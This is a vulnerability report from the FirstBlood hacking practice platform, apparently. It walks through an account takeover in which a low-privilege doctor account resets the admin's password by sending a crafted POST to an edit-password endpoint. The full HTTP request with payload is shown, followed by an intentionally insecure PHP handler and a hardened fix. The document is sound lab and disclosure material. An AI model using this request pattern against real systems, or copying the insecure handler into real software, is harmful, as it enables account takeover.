FirstBlood-#662: It is possible to reset drAdmin's password
This issue was discovered on FirstBlood v2.0.0 (issues patched)

On 2021-10-27, vigilante Level 4 reported:

Summary:

The admin user "drAdmin" is already configured but we don't have the password for it. We can register as a standard user and reset "drAdmin's" password.

When logged in as a normal user, we can see a snippet of code that indicates there's a password reset functionality.

/drpanel/index.php

    /* to do
    function editpassword(username) {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", '', true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

        xhr.onreadystatechange = function() {
            if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
                alert(this.responseText);
            } else {

            }
        }

        xhr.send();
    } */

To reset the "drAdmin's" password we just need to send a POST request and guess the name of the right endpoint.

Steps to Reproduce:

  1. Register a new Doctor's account by using "test" as the unique invite code. This is covered in my previous report id=377.
  2. Navigate to https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/drpanel/index.php and see the snippet of code mentioned earlier.
  3. Open the previous GET request, send it to Burp Repeater and modify the following. We're doing this to have the auth cookies included in the request.
    • Change the request method. This will change GET to POST.
    • Modify the endpoint to /drpanel/drapi/editpassword.php
    • Add the payload "username=dradmin&password=dradmin"

POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: d8a1eeb46146-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=a8100fb5e4101c701b23b66ca
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/login.php?action=login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

username=dradmin&password=dradmin
  4. We've received a new password for "drAdmin's" account and verified that we can log in.
    Password updated - RLMzAqTlm8BUG2v

Screenshots:

Impact

A new doctor's account with limited functionality is able to reset the true admin's account password.

P1 CRITICAL

Endpoint: drpanel/drapi/editpassword.php

This bug makes use of the following vulnerabilities in a chain:

  • Auth issues
  • Auth issues


FirstBlood ID: 24
Vulnerability Type: Auth issues

The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.

FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admin's password (dradmin) from /drapi/editpassword as it only looks at the username. Usernames can be enumerated when logging in, as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
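As an added illustration (not FirstBlood's source, which the page does not show), a hypothetical minimal PHP handler in the shape the report describes, where the only input that selects the target account is the submitted username, next to a hardened version that binds the change to the server-side session and requires the admin role for changing any other account. The table name, column names and session keys are assumptions.

```php
<?php
// Hypothetical reconstruction of the flaw, not the real FirstBlood code: the
// handler trusts the POSTed username, so any authenticated doctor can pick the
// admin account. The generated password mirrors the "Password updated - ..."
// response seen in the report.
function edit_password_vulnerable(PDO $db, array $post): string {
    $newPassword = bin2hex(random_bytes(8));
    $stmt = $db->prepare('UPDATE users SET password = ? WHERE LOWER(username) = LOWER(?)');
    $stmt->execute([password_hash($newPassword, PASSWORD_DEFAULT), $post['username']]);
    return 'Password updated - ' . $newPassword;
}

// Hardened version (assumed schema and $_SESSION layout): the target defaults
// to the caller's own account; anyone else's account requires the admin role,
// and every refusal is logged so the attempt shows up in monitoring.
function edit_password_hardened(PDO $db, array $session, array $post): string {
    if (empty($session['user_id']) || empty($session['username'])) {
        http_response_code(401);
        return 'Not authenticated';
    }
    $targetId = (int) $session['user_id'];
    $requested = $post['username'] ?? $session['username'];

    // Case-insensitive compare on purpose: the report shows "dradmin" matching
    // "drAdmin", so the authorization check must not be stricter than the lookup.
    if (strcasecmp($requested, $session['username']) !== 0) {
        if (($session['role'] ?? '') !== 'admin') {
            http_response_code(403);
            error_log(sprintf('authz: user %d denied password change for "%s"', $targetId, $requested));
            return 'Forbidden';
        }
        $lookup = $db->prepare('SELECT id FROM users WHERE LOWER(username) = LOWER(?)');
        $lookup->execute([$requested]);
        $targetId = (int) $lookup->fetchColumn();
        if ($targetId === 0) {
            http_response_code(404);
            return 'Unknown user';
        }
    }

    // Update by primary key, not by the attacker-controlled name.
    $newPassword = bin2hex(random_bytes(8));
    $stmt = $db->prepare('UPDATE users SET password = ? WHERE id = ?');
    $stmt->execute([password_hash($newPassword, PASSWORD_DEFAULT), $targetId]);
    error_log(sprintf('authz: user %d changed password of user %d', (int) $session['user_id'], $targetId));
    return 'Password updated - ' . $newPassword;
}
```

With the hardened handler, the request in the report (a doctor session posting username=dradmin) is answered with 403 and a log line, while the admin's own session can still change its password.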